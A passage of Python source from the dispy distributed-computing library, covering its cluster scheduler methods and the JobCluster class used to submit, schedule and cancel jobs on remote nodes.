cluster._dispy_nodes[node.ip_addr] = dispy_node self.shelf['node_%s' % (node.ip_addr)] = {'port': node.port, 'auth': node.auth} shelf_compute = self.shelf['compute_%s' % compute.id] shelf_compute['nodes'].append(node.ip_addr) self.shelf['compute_%s' % compute.id] = shelf_compute self.shelf.sync() r = yield node.setup(compute, exclusive=True, task=task) if r or compute.id not in self._clusters: cluster._dispy_nodes.pop(node.ip_addr, None) logger.warning('Failed to setup %s for compute "%s": %s', node.ip_addr, compute.name, r) # TODO: delete node from shelf's cluster._dispy_nodes del self.shelf['node_%s' % (node.ip_addr)] self.shelf.sync() yield node.close(compute, task=task) else: dispy_node.update_time = time.time() node.clusters.add(compute.id) self._sched_event.set() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Initialized, dispy_node, None))) def add_node(self, info): try: # assert info['version'] == _dispy_version assert info['port'] > 0 and info['cpus'] > 0 # TODO: check if it is one of ext_ip_addr? except: # logger.debug(traceback.format_exc()) return node = self._nodes.get(info['ip_addr'], None) if node is None: logger.debug('Discovered %s:%s (%s) with %s cpus', info['ip_addr'], info['port'], info['name'], info['cpus']) node = _Node(info['ip_addr'], info['port'], info['cpus'], info['sign'], self.secret, platform=info['platform'], keyfile=self.keyfile, certfile=self.certfile) node.name = info['name'] node.avail_info = info['avail_info'] self._nodes[node.ip_addr] = node else: node.last_pulse = time.time() auth = auth_code(self.secret, info['sign']) if info['cpus'] > 0: node.avail_cpus = info['cpus'] node.cpus = min(node.cpus, node.avail_cpus) for cid in node.clusters: cluster = self._clusters[cid] dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: dispy_node.avail_cpus = node.avail_cpus dispy_node.cpus = node.cpus else: logger.warning('Invalid "cpus" %s from %s ignored', info['cpus'], info['ip_addr']) if node.port == info['port'] and node.auth == auth: return logger.debug('Node %s rediscovered', info['ip_addr']) node.port = info['port'] if node.auth is not None: dead_jobs = [_job for _job in self._sched_jobs.values() if _job.node is not None and _job.node.ip_addr == node.ip_addr] self.reschedule_jobs(dead_jobs) node.busy = 0 node.auth = auth cids = list(node.clusters) node.clusters = set() for cid in cids: cluster = self._clusters.get(cid, None) if not cluster: continue dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None) if dispy_node and cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) node.auth = auth node_computations = [] node.name = info['name'] node.scheduler_ip_addr = info['scheduler_ip_addr'] for cid, cluster in self._clusters.items(): if cid in node.clusters: continue compute = cluster._compute for node_alloc in cluster._node_allocs: cpus = node_alloc.allocate(cluster, node.ip_addr, node.name, node.avail_cpus, avail_info=node.avail_info, platform=node.platform) if cpus <= 0: continue node.cpus = min(node.avail_cpus, cpus) node_computations.append(compute) break if node_computations: Task(self.setup_node, node, node_computations) def worker(self): # used for user callbacks only while 1: item = self.worker_Q.get(block=True) if item is None: self.worker_Q.task_done() break func, args = item try: func(*args) except: logger.debug('Running %s failed: %s', func.__name__, traceback.format_exc()) self.worker_Q.task_done() def finish_job(self, cluster, _job, status): # assert status in (DispyJob.Finished, DispyJob.Terminated, DispyJob.Abandoned) job = _job.job _job.finish(status) if cluster.callback: self.worker_Q.put((cluster.callback, (job,))) if status != DispyJob.ProvisionalResult: # assert cluster._pending_jobs > 0 cluster._pending_jobs -= 1 if cluster._pending_jobs == 0: cluster.end_time = time.time() cluster._complete.set() def job_reply_process(self, reply, sock, addr): _job = self._sched_jobs.get(reply.uid, None) if not _job or reply.hash != _job.hash: logger.warning('Ignoring invalid reply for job %s from %s', reply.uid, addr[0]) yield sock.send_msg(b'NAK') raise StopIteration job = _job.job job.ip_addr = reply.ip_addr node = self._nodes.get(reply.ip_addr, None) cluster = self._clusters.get(_job.compute_id, None) if cluster is None: # job cancelled while/after closing computation if node and node.busy > 0: node.busy -= 1 node.cpu_time += reply.end_time - reply.start_time node.last_pulse = time.time() self._sched_event.set() yield sock.send_msg(b'ACK') raise StopIteration if node is None: if self.shared: node = _Node(reply.ip_addr, 0, getattr(reply, 'cpus', 0), '', self.secret, platform='', keyfile=None, certfile=None) self._nodes[reply.ip_addr] = node dispy_node = DispyNode(node.ip_addr, node.name, node.cpus) dispy_node.update_time = time.time() cluster._dispy_nodes[reply.ip_addr] = dispy_node if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Initialized, dispy_node, None))) else: logger.warning('Ignoring invalid reply for job %s from %s', reply.uid, addr[0]) yield sock.send_msg(b'NAK') raise StopIteration node.last_pulse = time.time() job.result = deserialize(reply.result) job.stdout = reply.stdout job.stderr = reply.stderr job.exception = reply.exception job.start_time = reply.start_time job.end_time = reply.end_time logger.debug('Received reply for job %s / %s from %s', job.id, _job.uid, job.ip_addr) job._args = () job._kwargs = {} if reply.status == DispyJob.ProvisionalResult: self.finish_job(cluster, _job, reply.status) else: del self._sched_jobs[_job.uid] dispy_node = cluster._dispy_nodes[node.ip_addr] if reply.status == DispyJob.Finished or reply.status == DispyJob.Terminated: node.busy -= 1 node.cpu_time += reply.end_time - reply.start_time dispy_node.busy -= 1 dispy_node.cpu_time += reply.end_time - reply.start_time dispy_node.jobs_done += 1 dispy_node.update_time = time.time() elif reply.status == DispyJob.Cancelled: assert self.shared is True pass else: logger.warning('Invalid reply status: %s for job %s', reply.status, _job.uid) dispy_job = _job.job self.finish_job(cluster, _job, reply.status) if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (reply.status, dispy_node, dispy_job))) self._sched_event.set() yield sock.send_msg(b'ACK') def reschedule_jobs(self, dead_jobs): if not dead_jobs: return for _job in dead_jobs: cluster = self._clusters[_job.compute_id] del self._sched_jobs[_job.uid] dispy_node = cluster._dispy_nodes.get(_job.node.ip_addr, None) if dispy_node: dispy_node.cpus = 0 dispy_node.busy = 0 dispy_node.update_time = time.time() if cluster._compute.reentrant and not _job.pinned: logger.debug('Rescheduling job %s from %s', _job.uid, _job.node.ip_addr) _job.job.status = DispyJob.Created _job.job.ip_addr = None _job.node = None # TODO: call 'status_callback'? # _job.hash = ''.join(hex(x)[2:] for x in os.urandom(10)) cluster._jobs.append(_job) else: logger.debug('Job %s scheduled on %s abandoned', _job.uid, _job.node.ip_addr) # TODO: it is likely node finishes this job and sends # reply later; keep this in _abandoned_jobs and process reply? dispy_job = _job.job self.finish_job(cluster, _job, DispyJob.Abandoned) if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Abandoned, dispy_node, dispy_job))) self._sched_event.set() def run_job(self, _job, cluster, task=None): # generator node = _job.node dispy_node = cluster._dispy_nodes[node.ip_addr] try: yield _job.run(task=task) except EnvironmentError: logger.warning('Failed to run job %s on %s for computation %s; removing this node', _job.uid, node.ip_addr, cluster._compute.name) logger.debug(traceback.format_exc()) # TODO: remove the node from all clusters and globally? # this job might have been deleted already due to timeout node.clusters.discard(cluster._compute.id) if node.pending_jobs: for njob in node.pending_jobs: if njob.compute_id == cluster._compute.id: dispy_job = njob.job self.finish_job(cluster, njob, DispyJob.Cancelled) if cluster.status_callback and dispy_node: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, dispy_job))) node.pending_jobs = [njob for njob in node.pending_jobs if njob.compute_id != cluster._compute.id] if self._sched_jobs.pop(_job.uid, None) == _job: if not _job.pinned: cluster._jobs.insert(0, _job) node.busy -= 1 self._sched_event.set() except: logger.warning('Failed to run job %s on %s for computation %s', _job.uid, node.ip_addr, cluster._compute.name) logger.debug(traceback.format_exc()) # TODO: delay executing again for some time? # this job might have been deleted already due to timeout if self._sched_jobs.pop(_job.uid, None) == _job: dispy_job = _job.job self.finish_job(cluster, _job, DispyJob.Cancelled) if cluster.status_callback and dispy_node: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, dispy_job))) node.busy -= 1 self._sched_event.set() else: # job may have already finished (in which case _job.job would be None) if _job.job: _job.job.ip_addr = node.ip_addr logger.debug('Running job %s / %s on %s (busy: %d / %d)', _job.job.id, _job.uid, node.ip_addr, node.busy, node.cpus) _job.job.status = DispyJob.Running _job.job.start_time = time.time() dispy_node.busy += 1 dispy_node.update_time = time.time() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Running, dispy_node, _job.job))) if (not cluster._compute.reentrant) and (not cluster.status_callback) and _job.job: _job.job._args = () _job.job._kwargs = {} def load_balance_schedule(self): host = None load = 1.0 for node in self._nodes.values(): if node.busy >= node.cpus: continue if node.pending_jobs: host = node break if not any(self._clusters[cid]._jobs for cid in node.clusters): continue if (node.busy / node.cpus) < load: load = node.busy / node.cpus host = node return host def _schedule_jobs(self, task=None): # generator while not self.terminate: # n = sum(len(cluster._jobs) for cluster in self._clusters.values()) node = self.select_job_node() if not node: self._sched_event.clear() yield self._sched_event.wait() continue if node.pending_jobs: _job = node.pending_jobs.pop(0) else: # TODO: strategy to pick a cluster? _job = None for cid in node.clusters: if self._clusters[cid]._jobs: _job = self._clusters[cid]._jobs.pop(0) break if _job is None: self._sched_event.clear() yield self._sched_event.wait() continue cluster = self._clusters[_job.compute_id] _job.node = node # assert node.busy < node.cpus self._sched_jobs[_job.uid] = _job node.busy += 1 Task(self.run_job, _job, cluster) logger.debug('Scheduler quitting: %s', len(self._sched_jobs)) self._sched_jobs = {} for cid in list(self._clusters.keys()): cluster = self._clusters[cid] if not hasattr(cluster, '_compute'): # cluster is closed continue for _job in cluster._jobs: if _job.job.status == DispyJob.Running: status = DispyJob.Terminated else: status = DispyJob.Cancelled dispy_job = _job.job self.finish_job(cluster, _job, status) if cluster.status_callback: dispy_node = cluster._dispy_nodes.get(_job.node.ip_addr, None) if dispy_node: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (status, dispy_node, dispy_job))) for dispy_node in cluster._dispy_nodes.values(): node = self._nodes.get(dispy_node.ip_addr, None) if not node: continue for _job in node.pending_jobs: # TODO: delete only jobs for this cluster? if _job.job.status == DispyJob.Running: status = DispyJob.Terminated else: status = DispyJob.Cancelled dispy_job = _job.job self.finish_job(cluster, _job, status) if cluster.status_callback: dispy_node.update_time = time.time() self.worker_Q.put((cluster.status_callback, (status, dispy_node, dispy_job))) node.pending_jobs = [] cluster._jobs = [] cluster._pending_jobs = 0 yield self.del_cluster(cluster, task=task) self._clusters = {} self._nodes = {} logger.debug('Scheduler quit') def submit_job(self, _job, node=None, task=None): # generator _job.uid = id(_job) cluster = self._clusters[_job.compute_id] if node: node = self._nodes.get(node.ip_addr, None) if not node or _job.compute_id not in node.clusters: raise StopIteration(-1) node.pending_jobs.append(_job) _job.pinned = node else: cluster._jobs.append(_job) cluster._pending_jobs += 1 cluster._complete.clear() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Created, None, _job.job))) self._sched_event.set() yield 0 def cancel_job(self, job, task=None): # generator _job = job._dispy_job_ if _job is None: logger.warning('Job %s is invalid for cancellation!', job.id) raise StopIteration(-1) cluster = self._clusters.get(_job.compute_id, None) if not cluster: logger.warning('Invalid job %s for cluster "%s"!', _job.uid, cluster._compute.name) raise StopIteration(-1) # assert cluster._pending_jobs >= 1 if _job.job.status == DispyJob.Created: if _job.pinned: _job.pinned.pending_jobs.remove(_job) else: cluster._jobs.remove(_job) dispy_job = _job.job self.finish_job(cluster, _job, DispyJob.Cancelled) if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, None, dispy_job))) logger.debug('Cancelled (removed) job %s', _job.uid) raise StopIteration(0) elif not (_job.job.status == DispyJob.Running or _job.job.status == DispyJob.ProvisionalResult or _job.node is None): logger.warning('Job %s is not valid for cancel (%s)', _job.uid, _job.job.status) raise StopIteration(-1) _job.job.status = DispyJob.Cancelled # don't send this status - when job is terminated status/callback get called logger.debug('Job %s / %s is being terminated', _job.job.id, _job.uid) resp = yield _job.node.send(b'TERMINATE_JOB:' + serialize(_job), reply=False, task=task) if resp != 0: logger.debug('Terminating job %s / %s failed: %s', _job.job.id, _job.uid, resp) resp = -1 raise StopIteration(resp) def allocate_node(self, cluster, node_alloc, task=None): # generator if not isinstance(node_alloc, list): node_alloc = [node_alloc] node_allocs = _parse_node_allocs(node_alloc) if not node_allocs: raise StopIteration(-1) for i in range(len(node_allocs)-1, -1, -1): node = self._nodes.get(node_allocs[i].ip_addr, None) if node: dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: node.clusters.add(cluster._compute.id) self._sched_event.set() del node_allocs[i] continue if not node_allocs: raise StopIteration(0) cluster._node_allocs.extend(node_allocs) cluster._node_allocs = sorted(cluster._node_allocs, key=lambda node_alloc: node_alloc.ip_rex, reverse=True) present = set() cluster._node_allocs = [na for na in cluster._node_allocs if na.ip_rex not in present and not present.add(na.ip_rex)] del present yield self.add_cluster(cluster, task=task) yield self._sched_event.set() raise StopIteration(0) def deallocate_node(self, cluster, node, task=None): # generator node = _node_ipaddr(node) node = self._nodes.get(node, None) if node is None: raise StopIteration(-1) node.clusters.discard(cluster._compute.id) yield 0 def close_node(self, cluster, node, terminate_pending, task=None): # generator node = _node_ipaddr(node) node = self._nodes.get(node, None) if node is None: raise StopIteration(-1) node.clusters.discard(cluster._compute.id) jobs = [_job for _job in node.pending_jobs if _job.compute_id == cluster._compute.id] if cluster.status_callback: dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) for _job in jobs: self.worker_Q.put((cluster.status_callback, (DispyJob.Cancelled, dispy_node, _job.job))) if jobs: node.pending_jobs = [_job for _job in node.pending_jobs if _job.compute_id != cluster._compute.id] yield node.close(cluster._compute, terminate_pending=terminate_pending) def set_node_cpus(self, node, cpus, task=None): # generator try: cpus = int(cpus) except ValueError: raise StopIteration(-1) node = _node_ipaddr(node) node = self._nodes.get(node, None) if node is None: cpus = -1 else: if cpus >= 0: node.cpus = min(node.avail_cpus, cpus) elif (node.avail_cpus + cpus) >= 0: node.cpus = node.avail_cpus + cpus cpus = node.cpus for cid in node.clusters: cluster = self._clusters[cid] dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: dispy_node.cpus = cpus yield self._sched_event.set() raise StopIteration(cpus) def send_file(self, cluster, node, xf, task=None): node = self._nodes.get(node.ip_addr, None) if not node: raise StopIteration(-1) yield node.xfer_file(xf) def node_jobs(self, cluster, node, from_node, task=None): # generator ip_addr = node node = self._nodes.get(ip_addr, None) if not node: node = _node_ipaddr(ip_addr) if node: node = self._nodes.get(node, None) if not node or cluster._compute.id not in node.clusters: raise StopIteration([]) if from_node: sock = socket.socket(node.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: yield sock.connect((node.ip_addr, node.port)) yield sock.sendall(node.auth) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth} yield sock.send_msg(b'JOBS:' + serialize(req)) info = yield sock.recv_msg() _jobs = [self._sched_jobs.get(uid, None) for uid in deserialize(info)] jobs = [_job.job for _job in _jobs if _job] except: logger.debug(traceback.format_exc()) jobs = [] sock.close() else: jobs = [_job.job for _job in self._sched_jobs.values() if _job.node == node and _job.compute_id == cluster._compute.id] raise StopIteration(jobs) def shutdown(self): # non-generator if not self.shared: if self.terminate: return if any(cluster._pending_jobs for cluster in self._clusters.values()): return logger.debug('Shutting down scheduler ...') self.terminate = True def _terminate_scheduler(self, task=None): yield self._sched_event.set() Task(_terminate_scheduler, self).value() self.worker_Q.put(None) self._scheduler.value() self.worker_Q.join() if self.shelf: # TODO: need to check all clusters are deleted? self.shelf.close() self.shelf = None for ext in ('', '.db', '.bak', '.dat', '.dir'): if os.path.isfile(self.recover_file + ext): try: os.remove(self.recover_file + ext) except: pass class JobCluster(object): """Create an instance of cluster for a specific computation. """ def __init__(self, computation, nodes=None, depends=[], callback=None, cluster_status=None, ip_addr=None, port=None, node_port=None, ext_ip_addr=None, dest_path=None, loglevel=logger.INFO, setup=None, cleanup=True, ping_interval=None, pulse_interval=None, poll_interval=None, reentrant=False, secret='', keyfile=None, certfile=None, recover_file=None): """Create an instance of cluster for a specific computation. @computation is either a string (which is name of program, possibly with full path) or a python function or class method. @nodes is a list. Each element of @nodes is either a string (which must be either IP address or name of server node), or a tuple with up to 3 elements. The tuple's first element must be IP address or name of server node, second element, if present, must be port number where that node is listening for ping from clients, the third element, if present, must be number of CPUs to use on that node. @depends is a list. Each element of @depends is either a string or a python object. If the element is a string, it must be a file which will be transferred to the node executing a job for this cluster. If the element is a python object (a function name, class name etc.), then the code for that object is transferred to the node executing a job for this cluster. @callback is a function or class method. When a job's results become available, dispy will call provided callback function/method with that job as the argument. If a job sends provisional results with 'dispy_provisional_result' multiple times, then dispy will call provided callback each such time. The (provisional) results of computation can be retrieved with 'result' field of job, etc. While computations are run on nodes in isolated environments, callbacks are run in the context of user programs from which (Shared)JobCluster is called - for example, callbacks can access global variables in user programs. @cluster_status is a function or class method. When a node accepts this cluster's computation, a job is submitted, a jos is done or node is closed, given function is called with three parameters: an instance of DispyNode, node/job status (one of DispyNode.Initialized, DispyNode.Closed, or job status), and an instance of DispyJob (if job submitted, finished etc.) or None (if node started or closed). dispy queues these status messages and a worker thread calls the functions, so it is possible that actual current status of node may be different from the status indicated at the time status function is called. @ip_addr and @port indicate the address where the cluster will bind to. If multiple instances of JobCluster are used, these arguments are used only in the case of first instance. If no value for @ip_addr is given (default), IP address associated with the 'hostname' is used. If no value for @port is given (default), number 51347 is used. @ext_ip_addr is the IP address of NAT firewall/gateway if dispy client is behind that firewall/gateway. @node_port indicates port on which node servers are listening for ping messages. The client (JobCluster instance) broadcasts ping requests to this port. If no value for @node_port is given (default), number 51348 is used. @dest_path indicates path of directory to which files are transferred to a server node when executing a job. If @computation is a string, indicating a program, then that program is also transferred to @dest_path. @loglevel indicates message logging level. @cleanup indicates if the files transferred should be removed when shutting down. @secret is a string that is (hashed and) used for handshaking of communication with nodes. @certfile is path to file containing SSL certificate (see Python 'ssl' module). @keyfile is path to file containing private key for SSL communication (see Python 'ssl' module). This key may be stored in 'certfile' itself, in which case this should be None. @ping_interval is number of seconds between 1 and 1000. Normally dispy can find nodes running 'dispynode' by broadcasting 'ping' messages that nodes respond to. However, these packets may get lost. If ping_interval is set, then every ping_interval seconds, dispy sends ping messages to find nodes that may have missed earlier ping messages. @pulse_interval is number of seconds between 1 and 1000. If pulse_interval is set, dispy directs nodes to send 'pulse' messages to indicate they are computing submitted jobs. A node is presumed dead if 5*pulse_interval elapses without a pulse message. See 'reentrant' below. @poll_interval is number of seconds between 5 and 1000. If poll_interval is set, the client uses polling to check the status of jobs executed by nodes, instead of nodes connecting to the client to send the status of jobs, which is not possible if the client is behind a gateway / router which doesn't forward ports to where the client is running. Polling is not efficient, so it must be used only where necessary. @reentrant must be either True or False. This value is used only if 'pulse_interval' is set for any of the clusters. If pulse_interval is given and reentrant is False (default), jobs scheduled for a dead node are automatically cancelled; if reentrant is True, then jobs scheduled for a dead node are resubmitted to other eligible nodes. @recover_file must be either None (default) or file path. If this is None, dispy stores information about cluster in a file of the form '_dispy_YYYYMMDDHHMMSS' in current directory. If it is a path, dispy will use given path to store information. If user program terminates for some reason (such as raising an exception), it is possible to retrieve results of scheduled jobs later (after they are finished) by calling 'recover' function (implemented in this file) with this file. """ logger.setLevel(loglevel) pycos.logger.setLevel(loglevel) if reentrant is not True and reentrant is not False: logger.warning('Invalid value for reentrant (%s) is ignored; ' 'it must be either True or False', reentrant) reentrant = False if ping_interval is not None: try: ping_interval = float(ping_interval) assert 1.0 <= ping_interval <= 1000 except: raise Exception('Invalid ping_interval; must be between 1 and 1000') self.ping_interval = ping_interval if pulse_interval is not None: try: pulse_interval = float(pulse_interval) assert 1.0 <= pulse_interval <= 1000 except: raise Exception('Invalid pulse_interval; must be between 1 and 1000') self.pulse_interval = pulse_interval if poll_interval is not None: try: poll_interval = float(poll_interval) assert 5.0 <= poll_interval <= 1000 except: raise Exception('Invalid poll_interval; must be between 5 and 1000') self.poll_interval = poll_interval if callback: assert inspect.isfunction(callback) or inspect.ismethod(callback), \ 'callback must be a function or method' try: args = inspect.getargspec(callback) if inspect.isfunction(callback): assert len(args.args) == 1 else: assert len(args.args) == 2 if args.args[0] != 'self': logger.warning('First argument to callback method is not "self"') assert args.varargs is None assert args.keywords is None assert args.defaults is None except: raise Exception('Invalid callback function; ' 'it must take excatly one argument - an instance of DispyJob') self.callback = callback if cluster_status: assert inspect.isfunction(cluster_status) or inspect.ismethod(cluster_status), \ 'cluster_status must be a function or method' try: args = inspect.getargspec(cluster_status) if inspect.isfunction(cluster_status): assert len(args.args) == 3 else: assert len(args.args) == 4 if args.args[0] != 'self': logger.warning('First argument to cluster_status method is not "self"') assert args.varargs is None assert args.keywords is None assert args.defaults is None except: raise Exception('Invalid cluster_status function; ' 'it must take excatly 3 arguments') self.status_callback = cluster_status if hasattr(self, 'scheduler_ip_addr'): shared = True self._node_allocs = [] else: shared = False if not nodes: nodes = ['*'] elif not isinstance(nodes, list): if isinstance(nodes, str): nodes = [nodes] else: raise Exception('"nodes" must be list of IP addresses or host names') self._node_allocs = _parse_node_allocs(nodes) if not self._node_allocs: raise Exception('"nodes" argument is invalid') self._node_allocs = sorted(self._node_allocs, key=lambda node_alloc: node_alloc.ip_rex, reverse=True) self._dispy_nodes = {} if inspect.isfunction(computation): func = computation compute = _Compute(_Compute.func_type, func.__name__) lines = inspect.getsourcelines(func)[0] lines[0] = lines[0].lstrip() compute.code = ''.join(lines) elif isinstance(computation, str): compute = _Compute(_Compute.prog_type, computation) depends.append(computation) else: raise Exception('Invalid computation type: %s' % type(computation)) if setup: if inspect.isfunction(setup): depends.append(setup) compute.setup = _Function(setup.__name__, (), {}) elif isinstance(setup, functools.partial): depends.append(setup.func) if setup.args: args = setup.args else: args = () if setup.keywords: kwargs = setup.keywords else: kwargs = {} compute.setup = _Function(setup.func.__name__, args, kwargs) else: raise Exception('"setup" must be Python (partial) function') if inspect.isfunction(cleanup): depends.append(cleanup) compute.cleanup = _Function(cleanup.__name__, (), {}) elif isinstance(cleanup, functools.partial): depends.append(cleanup.func) if cleanup.args: args = cleanup.args else: args = () if cleanup.keywords: kwargs = cleanup.keywords else: kwargs = {} compute.cleanup = _Function(cleanup.func.__name__, args, kwargs) elif isinstance(cleanup, bool): compute.cleanup = cleanup else: raise Exception('"cleanup" must be Python (partial) function') self._cluster = _Cluster(ip_addr=ip_addr, port=port, node_port=node_port, ext_ip_addr=ext_ip_addr, shared=shared, secret=secret, keyfile=keyfile, certfile=certfile, recover_file=recover_file) atexit.register(self.shutdown) depend_ids = {} cwd = self._cluster.dest_path for dep in depends: if isinstance(dep, str) or inspect.ismodule(dep): if inspect.ismodule(dep): name = dep.__file__ if name.endswith('.pyc'): name = name[:-1] if not name.endswith('.py'): logger.warning('Invalid module "%s" - must be python source.', dep) continue if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) elif dep.__package__: dst = dep.__package__.replace('.', os.sep) else: dst = os.path.dirname(dep.__name__.replace('.', os.sep)) else: if os.path.isfile(dep): name = os.path.abspath(dep) elif compute.type == _Compute.prog_type: for p in os.environ['PATH'].split(os.pathsep): f = os.path.join(p, dep) if os.path.isfile(f): logger.debug('Assuming "%s" is program "%s"', dep, f) name = f break else: raise Exception('Path "%s" is not valid' % dep) if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) else: dst = '.' if name in depend_ids: continue try: with open(name, 'rb') as fd: pass xf = _XferFile(name, dst, compute.id) compute.xfer_files.add(xf) depend_ids[name] = dep except: raise Exception('File "%s" is not valid' % name) elif inspect.isfunction(dep) or inspect.isclass(dep) or hasattr(dep, '__class__'): if inspect.isfunction(dep) or inspect.isclass(dep): pass elif hasattr(dep, '__class__') and inspect.isclass(dep.__class__): dep = dep.__class__ if id(dep) in depend_ids: continue lines = inspect.getsourcelines(dep)[0] lines[0] = lines[0].lstrip() compute.code += '\n' + ''.join(lines) depend_ids[id(dep)] = id(dep) elif isinstance(dep, functools.partial): lines = inspect.getsourcelines(dep.func)[0] lines[0] = lines[0].lstrip() compute.code += '\n' + ''.join(lines) depend_ids[id(dep)] = id(dep) else: raise Exception('Invalid function: %s' % dep) if compute.code: # make sure code can be compiled code = compile(compute.code, '<string>', 'exec') del code if dest_path: if not isinstance(dest_path, str): raise Exception('Invalid dest_path: it must be a string') dest_path = dest_path.strip() # we should check for absolute path in dispynode.py as well if dest_path.startswith(os.sep): logger.warning('dest_path must not be absolute path') dest_path = dest_path.lstrip(os.sep) compute.dest_path = dest_path compute.scheduler_port = self._cluster.port compute.auth = hashlib.sha1(os.urandom(20)).hexdigest() compute.job_result_port = self._cluster.port compute.reentrant = reentrant compute.pulse_interval = pulse_interval self._compute = compute self._pending_jobs = 0 self._jobs = [] self._complete = threading.Event() self._complete.set() self.cpu_time = 0 self.start_time = time.time() self.end_time = None if not shared: Task(self._cluster.add_cluster, self).value() def submit(self, *args, **kwargs): """Submit a job for execution with the given arguments. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. """ if self._compute.type == _Compute.prog_type: args = [str(arg) for arg in args] try: _job = _DispyJob_(self._compute.id, args, kwargs) except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) return None if Task(self._cluster.submit_job, _job).value() == 0: return _job.job else: return None def submit_node(self, node, *args, **kwargs): """Submit a job for execution at 'node' with the given arguments. 'node' can be an instance of DispyNode (e.g., as received in cluster/job status callback) or IP address or host name. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. """ if isinstance(node, DispyNode): node = self._dispy_nodes.get(node.ip_addr, None) elif isinstance(node, str): if node[0].isdigit(): node = self._dispy_nodes.get(node, None) else: node = _node_ipaddr(node) node = self._dispy_nodes.get(node, None) else: node = None if not node: logger.warning('Invalid node') return None if self._compute.type == _Compute.prog_type: args = [str(arg) for arg in args] try: _job = _DispyJob_(self._compute.id, args, kwargs) except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) return None if Task(self._cluster.submit_job, _job, node).value() == 0: return _job.job else: return None def cancel(self, job): """Cancel given job. If the job is not yet running on any node, it is simply removed from scheduler's queue. If the job is running on a node, it is terminated/killed. Returns 0 if the job has been cancelled (i.e., removed from the queue or terminated). """ return Task(self._cluster.cancel_job, job).value() def allocate_node(self, node): """Allocate given node for this cluster. 'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.allocate_node, self, node).value() def deallocate_node(self, node): """Deallocate given node for this cluster. 'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.deallocate_node, self, node).value() def close_node(self, node, terminate_pending=False): """Close given node for this cluster. 'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.close_node, self, node, terminate_pending).value() def node_jobs(self, node, from_node=False): """Returns list of jobs currently running on given node, given as host name or IP address. """ return Task(self._cluster.node_jobs, self, node, from_node).value() def set_node_cpus(self, node, cpus): """Sets (alters) CPUs managed by dispy on a node, given as host name or IP address, to given number of CPUs. If the number of CPUs given is negative then that many CPUs are not used (from the available CPUs). """ return Task(self._cluster.set_node_cpus, node, cpus).value() def send_file(self, path, node): """Send file with given 'path' to 'node'. 'node' can be an instance of DispyNode (e.g., as received in cluster status callback) or IP address or host name. """ if isinstance(node, DispyNode): node = self._dispy_nodes.get(node.ip_addr, None) elif isinstance(node, str): if node[0].isdigit(): node = self._dispy_nodes.get(node, None) else: node = _node_ipaddr(node) node = self._dispy_nodes.get(node, None) else: node = None if not node: return -1 cwd = self._cluster.dest_path path = os.path.abspath(path) if path.startswith(cwd): dst = os.path.dirname(path[len(cwd):].lstrip(os.sep)) else: dst = '.' xf = _XferFile(path, dst, self._compute.id) return Task(self._cluster.send_file, self, node, xf).value() @property def name(self): """Returns name of computation. If the computation is Python function, then this would be name of the function. If the computation is a program, then this would be name of the program (without path). """ return self._compute.name def __enter__(self): return self def __exit__(self, exc_type, exc_value, trace): self.close() return True def status(self): """ Return cluster status (ClusterStatus structure). """ def _status(self, task=None): yield ClusterStatus(list(self._dispy_nodes.values()), self._pending_jobs) return Task(_status, self).value() def print_status(self, wall_time=None): """ Prints status of cluster (see 'status'). """ print('') heading = ' %30s | %5s | %7s | %10s | %13s' % \ ('Node', 'CPUs', 'Jobs', 'Sec/Job', 'Node Time Sec') print(heading) print('-' * len(heading)) info = self.status() cpu_time = 0.0 for dispy_node in info.nodes: cpu_time += dispy_node.cpu_time name = dispy_node.ip_addr if dispy_node.name: name += ' (' + dispy_node.name + ')' if dispy_node.jobs_done > 0: secs_per_job = dispy_node.cpu_time / dispy_node.jobs_done else: secs_per_job = 0 print(' %-30.30s | %5s | %7s | %10.3f | %13.3f' % (name, dispy_node.cpus, dispy_node.jobs_done, secs_per_job, dispy_node.cpu_time)) print('') if info.jobs_pending: print('Jobs pending: %s' % info.jobs_pending) msg = 'Total job time: %.3f sec' % cpu_time if not wall_time: wall_time = time.time() - self.start_time msg += ', wall time: %.3f sec, speedup: %.3f' % (wall_time, cpu_time / wall_time) print(msg) print('') # for backward compatibility stats = print_status def wait(self, timeout=None): """Wait for scheduled jobs to complete. """ return self._complete.wait(timeout=timeout) def __call__(self): """Wait for scheduled jobs to complete. """ self.wait() def close(self, timeout=None, terminate=False): """Close the cluster (jobs can no longer be submitted to it). If there are any jobs pending, this method waits until they all finish, unless 'terminate' is True in which case pending jobs are cancelled (removed or terminated by nodes executing them). Additional clusters may be created after this call returns. """ if self._compute: ret = self._complete.wait(timeout=timeout) if not terminate and not ret: return False self._complete.set() Task(self._cluster.del_cluster, self).value() self._compute = None return True def shutdown(self): """Close the cluster and shutdown the scheduler (so additional clusters can't be created). 